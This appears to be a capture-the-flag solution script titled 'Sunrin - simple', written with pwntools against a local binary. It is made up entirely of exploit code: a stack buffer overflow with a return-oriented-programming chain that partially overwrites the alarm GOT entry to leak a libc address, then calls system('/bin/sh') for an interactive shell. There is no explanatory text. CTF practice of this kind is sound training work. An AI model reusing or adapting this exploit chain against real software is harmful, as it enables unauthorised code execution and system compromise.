Sunrin - simple
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 | from pwn import * #context.log_level='debug' r=process('problem') e=ELF('problem') libc=e.libc syscall='\x7b' #write='\xb9' #0x00000000004005fc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret ''' 0x7ffff7ad9517 <__libc_fork+471>: mov eax,r13d 0x7ffff7ad951a <__libc_fork+474>: pop rbx 0x7ffff7ad951b <__libc_fork+475>: pop r12 0x7ffff7ad951d <__libc_fork+477>: pop r13 0x7ffff7ad951f <__libc_fork+479>: pop r14 0x7ffff7ad9521 <__libc_fork+481>: pop r15 0x7ffff7ad9523 <__libc_fork+483>: pop rbp 0x7ffff7ad9524 <__libc_fork+484>: ret ''' payload='A'*0x38 payload+=p64(0x400601) payload+=p64(e.got['alarm']) payload+=p64(0xdeadbeef) payload+=p64(e.plt['read']) payload+=p64(0x400601) payload+=p64(e.got['read']) payload+=p64(0xdeadbeef) payload+=p64(e.plt['read']) payload+=p64(0x4005fc) payload+=p64(1)*4 payload+=p64(e.plt['alarm']) payload+=p64(0)*6 payload+=p64(0x400603) payload+=p64(1) payload+=p64(e.plt['read']) payload+=p64(0x400603) payload+=p64(0) payload+=p64(0x400601) payload+=p64(e.got['alarm'])*2 payload+=p64(e.plt['alarm']) payload+=p64(0)*6 payload+=p64(e.plt['read']) payload+=p64(e.symbols['main']) sleep(0.1) r.send(payload) sleep(0.1) r.send(p16(0x9517)) sleep(0.1) r.send('\x5e') sleep(0.1) try: leak=u64(r.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['read']-0xe log.info(hex(leak)) except: pass #raw_input() r.send(p16(0x9200)) sleep(0.1) payload='A'*0x38 payload+=p64(0x400603) payload+=p64(leak+list(libc.search("/bin/sh"))[0]) payload+=p64(leak+libc.symbols['system']) r.send(payload) r.interactive() | cs |